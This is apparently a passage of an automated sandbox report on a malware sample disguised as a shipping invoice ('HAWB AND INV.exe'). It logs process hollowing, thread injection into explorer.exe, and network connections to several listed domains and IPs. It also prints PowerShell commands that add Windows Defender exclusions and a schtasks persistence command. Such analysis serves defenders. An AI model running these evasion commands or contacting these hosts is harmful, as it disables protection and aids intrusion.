          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02ADC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B08E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B91608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AE766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B9AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B9AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AE8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B137F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B6FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B6FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AFF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AEFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AEEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AE849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B914FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B56CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B56CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B56CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AF746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B6C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B6C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B01DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B01DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B01DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B035A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B88DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\HAWB AND INV.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.premier-moment.info
          Source: C:\Windows\explorer.exeDomain query: www.dinkoistmatrimony.com
          Source: C:\Windows\explorer.exeDomain query: www.vipbrandwatch.info
          Source: C:\Windows\explorer.exeDomain query: www.networkingmaderas.com
          Source: C:\Windows\explorer.exeDomain query: www.curvygirlholiday.com
          Source: C:\Windows\explorer.exeDomain query: www.ecosanhn.com
          Source: C:\Windows\explorer.exeNetwork Connect: 181.214.142.2 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 107.180.57.119 80
          Source: C:\Windows\explorer.exeNetwork Connect: 202.254.234.152 80
          Adds a directory exclusion to Windows DefenderShow sources
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HAWB AND INV.exe'
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HAWB AND INV.exe'
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\HAWB AND INV.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\HAWB AND INV.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\HAWB AND INV.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\HAWB AND INV.exeThread register set: target process: 3440
          Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 3440
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\HAWB AND INV.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\HAWB AND INV.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: AA0000
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HAWB AND INV.exe'
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp'
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Users\user\Desktop\HAWB AND INV.exe C:\Users\user\Desktop\HAWB AND INV.exe
          Source: explorer.exe, 0000000B.00000000.410165765.00000000083EB000.00000004.00000001.sdmp, ipconfig.exe, 00000017.00000002.598358599.0000000005100000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000B.00000002.593443753.00000000008B8000.00000004.00000020.sdmp, ipconfig.exe, 00000017.00000002.598358599.0000000005100000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000B.00000002.596560849.0000000000EE0000.00000002.00000001.sdmp, ipconfig.exe, 00000017.00000002.598358599.0000000005100000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 0000000B.00000002.596560849.0000000000EE0000.00000002.00000001.sdmp, ipconfig.exe, 00000017.00000002.598358599.0000000005100000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\HAWB AND INV.exeQueries volume information: C:\Users\user\Desktop\HAWB AND INV.exe VolumeInformation
          Source: C:\Users\user\Desktop\HAWB AND INV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\HAWB AND INV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\HAWB AND INV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\HAWB AND INV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\HAWB AND INV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\HAWB AND INV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
